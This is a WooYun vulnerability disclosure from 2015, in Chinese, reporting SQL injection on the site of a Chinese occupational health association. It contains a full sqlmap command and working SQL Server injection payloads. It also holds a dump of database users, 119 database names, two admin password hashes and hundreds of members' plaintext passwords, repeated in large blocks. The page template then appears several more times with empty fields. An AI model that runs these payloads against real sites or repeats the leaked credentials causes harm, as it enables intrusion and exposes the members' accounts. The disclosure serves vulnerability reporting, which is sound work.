中国职业安全健康协会职业卫生技术服务分会主站存在SQL注射漏洞（119个库13万系统备份数据泄露大量用户明文密码泄露）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154502

漏洞标题：中国职业安全健康协会职业卫生技术服务分会主站存在SQL注射漏洞（119个库13万系统备份数据泄露大量用户明文密码泄露）

漏洞作者：路人甲

提交时间：2015-11-20 20:16

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-20：细节已通知厂商并且等待厂商处理中
2015-11-24：厂商已经确认，细节仅向厂商公开
2015-12-04：细节向核心白帽子及相关领域专家公开
2015-12-14：细节向普通白帽子公开
2015-12-24：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

分会行业发展部负责网站日常管理维护，设有一名专职网站管理员，具体负责网站信息收集汇总、内容更新、信息发布、会员单位注册管理、组织协调各部门等工作。

详细说明：

地址：

mask 区域

1.http://**.**.**/search.aspkeyword=%C7%EB%CA%E4%C8%EB%B9%D8%BC%FC%D7%D6&button2=OpiM

python sqlmap.py -u "http://**.**.**.**/search.asp?keyword=%C7%EB%CA%E4%C8%EB%B9%D8%BC%FC%D7%D6&button2=OpiM" -p keyword --technique=EST --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass --dbs

Database: msdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.backupfile                       | 130996  |

漏洞证明：

---
Parameter: keyword (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: keyword=%C7%EB%CA%E4%C8%EB%B9%D8%BC%FC%D7%D6' AND 3198=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3198=3198) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'Vpjp' LIKE 'Vpjp&button2=OpiM
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: keyword=%C7%EB%CA%E4%C8%EB%B9%D8%BC%FC%D7%D6';WAITFOR DELAY '0:0:5'--&button2=OpiM
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: keyword=%C7%EB%CA%E4%C8%EB%B9%D8%BC%FC%D7%D6' WAITFOR DELAY '0:0:5'--&button2=OpiM
---
web server operating system: Windows 8 or 2012
web application technology: Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2000
current user:    'cnohsc'
current user is DBA:    False
database management system users [113]:
[*] abdcg
[*] ahnanfang
[*] baijiu001
[*] basit
[*] basiteoil
[*] bdlj
[*] beilijx
[*] benfajidian
[*] bjbljj
[*] bjnhr
[*] bjwfd
[*] blsjwl
[*] BUILTIN\\Administrators
[*] buoyandpipe
[*] ccszx
[*] chinaeubo
[*] chinaneweast
[*] cnohsc
[*] corfuhj
[*] czjxskjcfu
[*] dclsd
[*] df09
[*] dfgyly
[*] dgkdhb
[*] dkhulu
[*] edgemfg
[*] everdp
[*] fengren
[*] fusenjx
[*] futurelooking
[*] fzguotai
[*] gaoke-jt
[*] glasshyzx
[*] glassman
[*] gxjl-bearing
[*] hbqxxyzz
[*] hbwanmao
[*] hegengfarm
[*] hgqzj
[*] hhjhzy
[*] hhnmzy
[*] highsun-tech
[*] hongyehuida
[*] honlisz
[*] hrhb0769
[*] htkyjx
[*] huashekafei
[*] hxhb
[*] hxhgkj
[*] hxxh
[*] hzmirui
[*] ibibiz
[*] ibicn-wlyx
[*] ijiaozhun
[*] jiangyin
[*] jinzuantuan
[*] jxruisibo
[*] kyzgjt
[*] ldjhly
[*] lfshengtongjixie
[*] lhlgj
[*] linxan
[*] ltdsz
[*] lxlswh
[*] meisun-chem
[*] mgxf
[*] noblechinese
[*] pxgjc
[*] rdsfw
[*] rdsfw-new
[*] renaigroup
[*] renaiholdings
[*] renaitech
[*] rsd777
[*] rsdrjkj
[*] sa
[*] sda888
[*] sdadm
[*] sdjzsj5y
[*] shandonghengxin
[*] shebeiask
[*] shebeiaskv2
[*] shuangxiangpack
[*] smsf168
[*] sotantl
[*] sunluboil
[*] test
[*] tianfuli
[*] tianjinbaoxing
[*] tjggzy
[*] tjhjdsm
[*] tjshanxing
[*] tongqiukeji
[*] tongxingkeji
[*] totry-hydraulis
[*] tshlkj
[*] tshphy
[*] tstxdq
[*] uei114-member.qiche
[*] wang_xiaoya
[*] wdlrunhuayou
[*] wfxjzzgy
[*] wonway
[*] wshanhong
[*] wxjg88
[*] xmtio2
[*] yangxun
[*] ysw1950
[*] yyblly
[*] yzdj119
[*] zhagunchina
[*] zhengyangweiye
[*] zx-hifon
database management system users password hashes:
[*] basiteoil [1]:
    password hash: \x02A
[*] sdadm [1]:
    password hash: \x11
Database: pubs
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.roysched                         | 86      |
| dbo.employee                         | 43      |
| dbo.sysconstraints                   | 34      |
| dbo.titleauthor                      | 25      |
| dbo.titleview                        | 25      |
| dbo.authors                          | 23      |
| dbo.sales                            | 21      |
| dbo.titles                           | 18      |
| dbo.jobs                             | 14      |
| dbo.pub_info                         | 8       |
| dbo.publishers                       | 8       |
| dbo.stores                           | 6       |
| dbo.discounts                        | 3       |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: tempdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS        | 2294    |
| dbo.spt_values                       | 730     |
| INFORMATION_SCHEMA.ROUTINES          | 652     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379     |
| INFORMATION_SCHEMA.COLUMNS           | 379     |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 295     |
| INFORMATION_SCHEMA.SCHEMATA          | 120     |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE  | 62      |
| dbo.spt_datatype_info                | 36      |
| INFORMATION_SCHEMA.TABLES            | 34      |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES  | 33      |
| dbo.spt_server_info                  | 29      |
| dbo.spt_provider_types               | 25      |
| INFORMATION_SCHEMA.VIEWS             | 25      |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS   | 17      |
| dbo.spt_datatype_info_ext            | 10      |
| dbo.syssegments                      | 3       |
| dbo.spt_monitor                      | 1       |
| dbo.sysconstraints                   | 1       |
+--------------------------------------+---------+
Database: cnohsc
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.award                            | 4538    |
| dbo.district                         | 3385    |
| dbo.article                          | 1511    |
| dbo.zzcx                             | 466     |
| dbo.member1                          | 396     |
| dbo.member                           | 334     |
| dbo.zybwh                            | 202     |
| dbo.zybys                            | 114     |
| dbo.sys_role_operation               | 90      |
| dbo.sys_user_operation               | 90      |
| dbo.sysconstraints                   | 80      |
| dbo.sys_operation                    | 61      |
| dbo.tongji                           | 49      |
| dbo.article_category                 | 40      |
| dbo.yrdw                             | 36      |
| dbo.message                          | 15      |
| dbo.recommend                        | 15      |
| dbo.introduce                        | 10      |
| dbo.ad_advertise                     | 7       |
| dbo.article_keyword                  | 6       |
| dbo.ad_position                      | 3       |
| dbo.syssegments                      | 3       |
| dbo.ad_template                      | 2       |
| dbo.recommend_column                 | 2       |
| dbo.recommend_entity                 | 2       |
| dbo.sys_role                         | 2       |
| dbo.sys_user                         | 2       |
| dbo.sys_user_role                    | 2       |
| dbo.topic_template                   | 1       |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table                                | Entries |
+--------------------------------------+---------+
| dbo.backupfile                       | 130996  |
| dbo.backupset                        | 65498   |
| dbo.backupmediafamily                | 65495   |
| dbo.backupmediaset                   | 65495   |
| dbo.sysconstraints                   | 101     |
| dbo.syscategories                    | 19      |
| dbo.syssegments                      | 3       |
+--------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: master
Table: sysoledbusers
[1 column]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| rmtpassword | nvarchar |
+-------------+----------+
Database: master
Table: syslogins
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: cnohsc
Table: member
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: cnohsc
Table: sys_user
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: cnohsc
Table: member1
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: cnohsc
Table: member
[334 entries]
+-----------------+
| password        |
+-----------------+
| 008861          |
| 01056546969     |
| 017612          |
| 02431977715     |
| 02965654408     |
| 04535672302     |
| 053268013025    |
| 09515059412     |
| 103372          |
| 110620          |
| 110911          |
| 111111          |
| 123.456         |
| 123456          |
| 12345678        |
| 1234567890      |
| 129300          |
| 13548943130     |
| 13886350699     |
| 159357          |
| 182183          |
| 186688          |
| 199199          |
| 20110401        |
| 20140530        |
| 201414          |
| 2049800         |
| 22287340        |
| 22341119        |
| 23373040        |
| 23388550        |
| 24935930        |
| 27873222        |
| 2880505         |
| 301312          |
| 306306          |
| 3065066         |
| 3111903         |
| 3366887         |
| 34063101        |
| 355166          |
| 3631983         |
| 4115343         |
| 4510566xj       |
| 51893455        |
| 55181616        |
| 553577          |
| 55975619        |
| 5a0278          |
| 62218445        |
| 6350239         |
| 63514173        |
| 63700080        |
| 63832018        |
| 64407055        |
| 66213740        |
| 67773577        |
| 67793206        |
| 678816          |
| 680308          |
| 680822          |
| 709709709       |
| 7553112         |
| 756624          |
| 7762678         |
| 8222593         |
| 83869661        |
| 85312088        |
| 8611            |
| 86113158        |
| 8613714         |
| 86362506        |
| 86387255        |
| 86532774        |
| 86557119        |
| 87805024        |
| 87816305        |
| 880206          |
| 8802499         |
| 88235181        |
| 896745          |
| 961020yt        |
| 96189924        |
| 999999          |
| a123456789      |
| a19700912       |
| ab1920          |
| abcd1234        |
| abkj1162        |
| ankeyuan126com  |
| anlong2014      |
| ayds22869222    |
| cdc258cdc       |
| cqzryjy         |
| degas           |
| ets20080505     |
| fywxm1970       |
| gdajzx          |
| giian168        |
| guoxingzhou#    |
| gw5075          |
| gxarh5905176    |
| gzzkfh168       |
| hct84616666     |
| hnszfs232007    |
| hnyy66591609!   |
| hte89831197     |
| huabang1        |
| huanwan         |
| JHHB28691216    |
| jsat83567077    |
| jskdjc          |
| ky101ky101      |
| lifangkeji      |
| lmlyhy          |
| lnwyzyws        |
| mas57153140     |
| nyzf3901312     |
| pj12365412      |
| ponyzw          |
| QZZJ87622998    |
| safe65321548    |
| safety          |
| scdc@1380       |
| sdwh2014        |
| sh50682766      |
| shanxianke1005  |
| sw0629          |
| sxztzyws        |
| tb83709188zw    |
| tdy8383         |
| tianjinrad      |
| tjjc            |
| UTS2015         |
| wangjiayu       |
| wdjsdcdc        |
| wtijyzx         |
| xh1971521       |
| ya3851770       |
| ybxcdcwsk       |
| ynyjyy          |
| yzh19870609     |
| zfs5258         |
| zhonganlvchuang |
| zoholy2065399   |
| zxjykj          |
| 008861          |
| 01056546969     |
| 017612          |
| 02431977715     |
| 02965654408     |
| 04535672302     |
| 053268013025    |
| 09515059412     |
| 103372          |
| 110620          |
| 110911          |
| 111111          |
| 123.456         |
| 123456          |
| 12345678        |
| 1234567890      |
| 129300          |
| 13548943130     |
| 13886350699     |
| 159357          |
| 182183          |
| 186688          |
| 199199          |
| 20110401        |
| 20140530        |
| 201414          |
| 2049800         |
| 22287340        |
| 22341119        |
| 23373040        |
| 23388550        |
| 24935930        |
| 27873222        |
| 2880505         |
| 301312          |
| 306306          |
| 3065066         |
| 3111903         |
| 3366887         |
| 34063101        |
| 355166          |
| 3631983         |
| 4115343         |
| 4510566xj       |
| 51893455        |
| 55181616        |
| 553577          |
| 55975619        |
| 5a0278          |
| 62218445        |
| 6350239         |
| 63514173        |
| 63700080        |
| 63832018        |
| 64407055        |
| 66213740        |
| 67773577        |
| 67793206        |
| 678816          |
| 680308          |
| 680822          |
| 709709709       |
| 7553112         |
| 756624          |
| 7762678         |
| 8222593         |
| 83869661        |
| 85312088        |
| 8611            |
| 86113158        |
| 8613714         |
| 86362506        |
| 86387255        |
| 86532774        |
| 86557119        |
| 87805024        |
| 87816305        |
| 880206          |
| 8802499         |
| 88235181        |
| 896745          |
| 961020yt        |
| 96189924        |
| 999999          |
| a123456789      |
| a19700912       |
| ab1920          |
| abcd1234        |
| abkj1162        |
| ankeyuan126com  |
| anlong2014      |
| ayds22869222    |
| cdc258cdc       |
| cqzryjy         |
| degas           |
| ets20080505     |
| fywxm1970       |
| gdajzx          |
| giian168        |
| guoxingzhou#    |
| gw5075          |
| gxarh5905176    |
| gzzkfh168       |
| hct84616666     |
| hnszfs232007    |
| hnyy66591609!   |
| hte89831197     |
| huabang1        |
| huanwan         |
| JHHB28691216    |
| jsat83567077    |
| jskdjc          |
| ky101ky101      |
| lifangkeji      |
| lmlyhy          |
| lnwyzyws        |
| mas57153140     |
| nyzf3901312     |
| pj12365412      |
| ponyzw          |
| QZZJ87622998    |
| safe65321548    |
| safety          |
| scdc@1380       |
| sdwh2014        |
| sh50682766      |
| shanxianke1005  |
| sw0629          |
| sxztzyws        |
| tb83709188zw    |
| tdy8383         |
| tianjinrad      |
| tjjc            |
| UTS2015         |
| wangjiayu       |
| wdjsdcdc        |
| wtijyzx         |
| xh1971521       |
| ya3851770       |
| ybxcdcwsk       |
| ynyjyy          |
| yzh19870609     |
| zfs5258         |
| zhonganlvchuang |
| zoholy2065399   |
| zxjykj          |
| 008861          |
| 01056546969     |
| 017612          |
| 02431977715     |
| 02965654408     |
| 04535672302     |
| 053268013025    |
| 09515059412     |
| 103372          |
| 110620          |
| 110911          |
| 111111          |
| 123.456         |
| 123456          |
| 12345678        |
| 1234567890      |
| 129300          |
| 13548943130     |
| 13886350699     |
| 159357          |
| 182183          |
| 186688          |
| 199199          |
| 20110401        |
| 20140530        |
| 201414          |
| 2049800         |
| 22287340        |
| 22341119        |
| 23373040        |
| 23388550        |
| 24935930        |
| 27873222        |
| 2880505         |
| 301312          |
| 306306          |
| 3065066         |
| 3111903         |
| 3366887         |
| 34063101        |
| 355166          |
| 3631983         |
+-----------------+
Database: cnohsc
Table: sys_user
[2 entries]
+----------------------------------+
| password                         |
+----------------------------------+
| 09573BE33652386766CAA95F1229909E |
| 9BEF704C6B099CE1548E0DEA3154B26A |
+----------------------------------+
Database: cnohsc
Table: member1
[396 entries]
+----------------+
| password       |
+----------------+
| 008861         |
| 01056546969    |
| 017612         |
| 103372         |
| 110911         |
| 111111         |
| 123456         |
| 129300         |
| 159357         |
| 182183         |
| 186688         |
| 20110401       |
| 201414         |
| 22287340       |
| 23373040       |
| 27873222       |
| 301312         |
| 306306         |
| 3065066        |
| 34063101       |
| 3631983        |
| 4115343        |
| 51893455       |
| 55181616       |
| 553577         |
| 55975619       |
| 5a0278         |
| 62218445       |
| 63514173       |
| 64407055       |
| 66213740       |
| 67773577       |
| 678816         |
| 680822         |
| 7553112        |
| 756624         |
| 8222593        |
| 831832         |
| 83869661       |
| 85312088       |
| 8613714        |
| 86387255       |
| 86532774       |
| 86557119       |
| 87805024       |
| 880206         |
| 88235181       |
| 96189924       |
| ab1920         |
| abkj1162       |
| ankeyuan126com |
| anlong2014     |
| cdc258cdc      |
| cqzryjy        |
| fywxm1970      |
| gdajzx         |
| giian168       |
| guoxingzhou#   |
| hnyy66591609!  |
| ky101ky101     |
| lnwyzyws       |
| nyzf3901312    |
| scdc@1380      |
| sdwh2014       |
| shanxianke1005 |
| tb83709188zw   |
| wdjsdcdc       |
| wtijyzx        |
| ya3851770      |
| zfs5258        |
| zoholy2065399  |
| 008861         |
| 01056546969    |
| 017612         |
| 103372         |
| 110911         |
| 111111         |
| 123456         |
| 129300         |
| 159357         |
| 182183         |
| 186688         |
| 20110401       |
| 201414         |
| 22287340       |
| 23373040       |
| 27873222       |
| 301312         |
| 306306         |
| 3065066        |
| 34063101       |
| 3631983        |
| 4115343        |
| 51893455       |
| 55181616       |
| 553577         |
| 55975619       |
| 5a0278         |
| 62218445       |
| 63514173       |
| 64407055       |
| 66213740       |
| 67773577       |
| 678816         |
| 680822         |
| 7553112        |
| 756624         |
| 8222593        |
| 831832         |
| 83869661       |
| 85312088       |
| 8613714        |
| 86387255       |
| 86532774       |
| 86557119       |
| 87805024       |
| 880206         |
| 88235181       |
| 96189924       |
| ab1920         |
| abkj1162       |
| ankeyuan126com |
| anlong2014     |
| cdc258cdc      |
| cqzryjy        |
| fywxm1970      |
| gdajzx         |
| giian168       |
| guoxingzhou#   |
| hnyy66591609!  |
| ky101ky101     |
| lnwyzyws       |
| nyzf3901312    |
| scdc@1380      |
| sdwh2014       |
| shanxianke1005 |
| tb83709188zw   |
| wdjsdcdc       |
| wtijyzx        |
| ya3851770      |
| zfs5258        |
| zoholy2065399  |
| 008861         |
| 01056546969    |
| 017612         |
| 103372         |
| 110911         |
| 111111         |
| 123456         |
| 129300         |
| 159357         |
| 182183         |
| 186688         |
| 20110401       |
| 201414         |
| 22287340       |
| 23373040       |
| 27873222       |
| 301312         |
| 306306         |
| 3065066        |
| 34063101       |
| 3631983        |
| 4115343        |
| 51893455       |
| 55181616       |
| 553577         |
| 55975619       |
| 5a0278         |
| 62218445       |
| 63514173       |
| 64407055       |
| 66213740       |
| 67773577       |
| 678816         |
| 680822         |
| 7553112        |
| 756624         |
| 8222593        |
| 831832         |
| 83869661       |
| 85312088       |
| 8613714        |
| 86387255       |
| 86532774       |
| 86557119       |
| 87805024       |
| 880206         |
| 88235181       |
| 96189924       |
| ab1920         |
| abkj1162       |
| ankeyuan126com |
| anlong2014     |
| cdc258cdc      |
| cqzryjy        |
| fywxm1970      |
| gdajzx         |
| giian168       |
| guoxingzhou#   |
| hnyy66591609!  |
| ky101ky101     |
| lnwyzyws       |
| nyzf3901312    |
| scdc@1380      |
| sdwh2014       |
| shanxianke1005 |
| tb83709188zw   |
| wdjsdcdc       |
| wtijyzx        |
| ya3851770      |
| zfs5258        |
| zoholy2065399  |
| 008861         |
| 01056546969    |
| 017612         |
| 103372         |
| 110911         |
| 111111         |
| 123456         |
| 129300         |
| 159357         |
| 182183         |
| 186688         |
| 20110401       |
| 201414         |
| 22287340       |
| 23373040       |
| 27873222       |
| 301312         |
| 306306         |
| 3065066        |
| 34063101       |
| 3631983        |
| 4115343        |
| 51893455       |
| 55181616       |
| 553577         |
| 55975619       |
| 5a0278         |
| 62218445       |
| 63514173       |
| 64407055       |
| 66213740       |
| 67773577       |
| 678816         |
| 680822         |
| 7553112        |
| 756624         |
| 8222593        |
| 831832         |
| 83869661       |
| 85312088       |
| 8613714        |
| 86387255       |
| 86532774       |
| 86557119       |
| 87805024       |
| 880206         |
| 88235181       |
| 96189924       |
| ab1920         |
| abkj1162       |
| ankeyuan126com |
| anlong2014     |
| cdc258cdc      |
| cqzryjy        |
| fywxm1970      |
| gdajzx         |
| giian168       |
| guoxingzhou#   |
| hnyy66591609!  |
| ky101ky101     |
| lnwyzyws       |
| nyzf3901312    |
| scdc@1380      |
| sdwh2014       |
| shanxianke1005 |
| tb83709188zw   |
| wdjsdcdc       |
| wtijyzx        |
| ya3851770      |
| zfs5258        |
| zoholy2065399  |
| 008861         |
| 01056546969    |
| 017612         |
| 103372         |
| 110911         |
| 111111         |
| 123456         |
| 129300         |
| 159357         |
| 182183         |
| 186688         |
| 20110401       |
| 201414         |
| 22287340       |
| 23373040       |
| 27873222       |
| 301312         |
| 306306         |
| 3065066        |
| 34063101       |
| 3631983        |
| 4115343        |
| 51893455       |
| 55181616       |
| 553577         |
| 55975619       |
| 5a0278         |
| 62218445       |
| 63514173       |
| 64407055       |
| 66213740       |
| 67773577       |
| 678816         |
| 680822         |
| 7553112        |
| 756624         |
| 8222593        |
| 831832         |
| 83869661       |
| 85312088       |
| 8613714        |
| 86387255       |
| 86532774       |
| 86557119       |
| 87805024       |
| 880206         |
| 88235181       |
| 96189924       |
| ab1920         |
| abkj1162       |
| ankeyuan126com |
| anlong2014     |
| cdc258cdc      |
| cqzryjy        |
| fywxm1970      |
| gdajzx         |
| giian168       |
| guoxingzhou#   |
| hnyy66591609!  |
| ky101ky101     |
| lnwyzyws       |
| nyzf3901312    |
| scdc@1380      |
| sdwh2014       |
| shanxianke1005 |
| tb83709188zw   |
| wdjsdcdc       |
| wtijyzx        |
| ya3851770      |
| zfs5258        |
| zoholy2065399  |
| 008861         |
| 01056546969    |
| 017612         |
| 103372         |
| 110911         |
| 111111         |
| 123456         |
| 129300         |
| 159357         |
| 182183         |
| 186688         |
| 20110401       |
| 201414         |
| 22287340       |
| 23373040       |
| 27873222       |
| 301312         |
| 306306         |
| 3065066        |
| 34063101       |
| 3631983        |
| 4115343        |
| 51893455       |
| 55181616       |
| 553577         |
| 55975619       |
| 5a0278         |
| 62218445       |
| 63514173       |
| 64407055       |
| 66213740       |
| 67773577       |
| 678816         |
| 680822         |
| 7553112        |
| 756624         |
| 8222593        |
| 831832         |
| 83869661       |
| 85312088       |
| 8613714        |
+----------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keyword (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: keyword=%C7%EB%CA%E4%C8%EB%B9%D8%BC%FC%D7%D6' AND 3198=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(118)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3198=3198) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'Vpjp' LIKE 'Vpjp&button2=OpiM
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: keyword=%C7%EB%CA%E4%C8%EB%B9%D8%BC%FC%D7%D6';WAITFOR DELAY '0:0:5'--&button2=OpiM
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: keyword=%C7%EB%CA%E4%C8%EB%B9%D8%BC%FC%D7%D6' WAITFOR DELAY '0:0:5'--&button2=OpiM
---
web server operating system: Windows 8 or 2012
web application technology: Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2000
available databases [119]:
[*] abdcg
[*] ahnanfang
[*] ahnanfang-en
[*] ahnanfang-henan
[*] ahnanfang-jiangsu
[*] ahnanfang-jiangxi
[*] ahnanfang-shandong
[*] ahnanfang-shanghai
[*] ahnanfang-zhejiang
[*] baijiu001
[*] basiteoil
[*] bdlj
[*] beilijx
[*] beilijx-en
[*] benfajidian
[*] bjbljj
[*] bjnhr
[*] bjwfd
[*] blsjwl
[*] buoyandpipe
[*] buoyandpipe-en
[*] ccszx
[*] chinaeubo
[*] chinaeubo-en
[*] chinaneweast
[*] cnohsc
[*] corfuhj
[*] czjxskjcfu
[*] dclsd
[*] df09
[*] dfgyly
[*] dgkdhb
[*] edgemfg
[*] everdp
[*] fengren
[*] futurelooking
[*] futurelooking-new
[*] fzguotai
[*] gaoke-jt
[*] glassman
[*] gxjl-bearing
[*] hbqxxyzz
[*] hegengfarm
[*] hgqzj
[*] hhjhzy
[*] hhnmzy
[*] highsun-en
[*] highsun-tech
[*] hongyehuida
[*] honlisz
[*] hrhb0769
[*] htkyjx
[*] huashekafei
[*] hxhb
[*] hxhgkj
[*] ibibiz
[*] ijiaozhun
[*] jiangyin
[*] jinzuantuan
[*] jxruisibo
[*] kyzgjt
[*] ldjhly
[*] lfshengtongjixie
[*] lhlgj
[*] linxan
[*] linxan-m
[*] ltdsz
[*] ltdsz-en
[*] master
[*] meisun-chem
[*] miruihugong
[*] model
[*] msdb
[*] noblechinese
[*] pubs
[*] rdsfw-new
[*] rdsfw-shufa
[*] rdsfw-www
[*] renaigroup
[*] renaigroup-en
[*] renaiholdings
[*] renaiholdings-en
[*] renaitech
[*] renaitech-en
[*] rsdrjkj
[*] sda888
[*] sdadm
[*] sdjzsj5y
[*] sdjzsj5y-wap
[*] shebeiask
[*] shuangxiangpack
[*] smsf168
[*] sotantl
[*] sunluboil
[*] sxhhnmzy
[*] tempdb
[*] tianfuli
[*] tianjinbaoxing
[*] tjggzy
[*] tjggzy-en
[*] tjhjdsm
[*] tjshanxing
[*] tongqiukeji
[*] totry-hydraulis
[*] tshlkj
[*] tshphy
[*] tshphy-en
[*] tstxdq
[*] wanshanhong-wap
[*] wdlrunhuayou
[*] wfxjzzgy
[*] wonway
[*] wxjg88-en
[*] xmtio2
[*] xmtio2-en
[*] ysw1950
[*] yzdj119
[*] zhengyangweiye
[*] zx-hifon

修复方案：

增加过滤。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：13

确认时间：2015-11-24 18:51

厂商回复：

CNVD确认并复现所述情况，已由CNVD通过网站管理方公开联系渠道向其邮件通报，由其后续提供解决方案。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154502

漏洞标题：中国职业安全健康协会职业卫生技术服务分会主站存在SQL注射漏洞（119个库13万系统备份数据泄露大量用户明文密码泄露）

相关厂商：中国职业安全健康协会职业卫生技术服务分会

漏洞作者：路人甲

提交时间：2015-11-20 20:16

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154502

漏洞标题：中国职业安全健康协会职业卫生技术服务分会主站存在SQL注射漏洞（119个库13万系统备份数据泄露大量用户明文密码泄露）

相关厂商：中国职业安全健康协会职业卫生技术服务分会

漏洞作者： 路人甲

提交时间：2015-11-20 20:16

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0154502"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云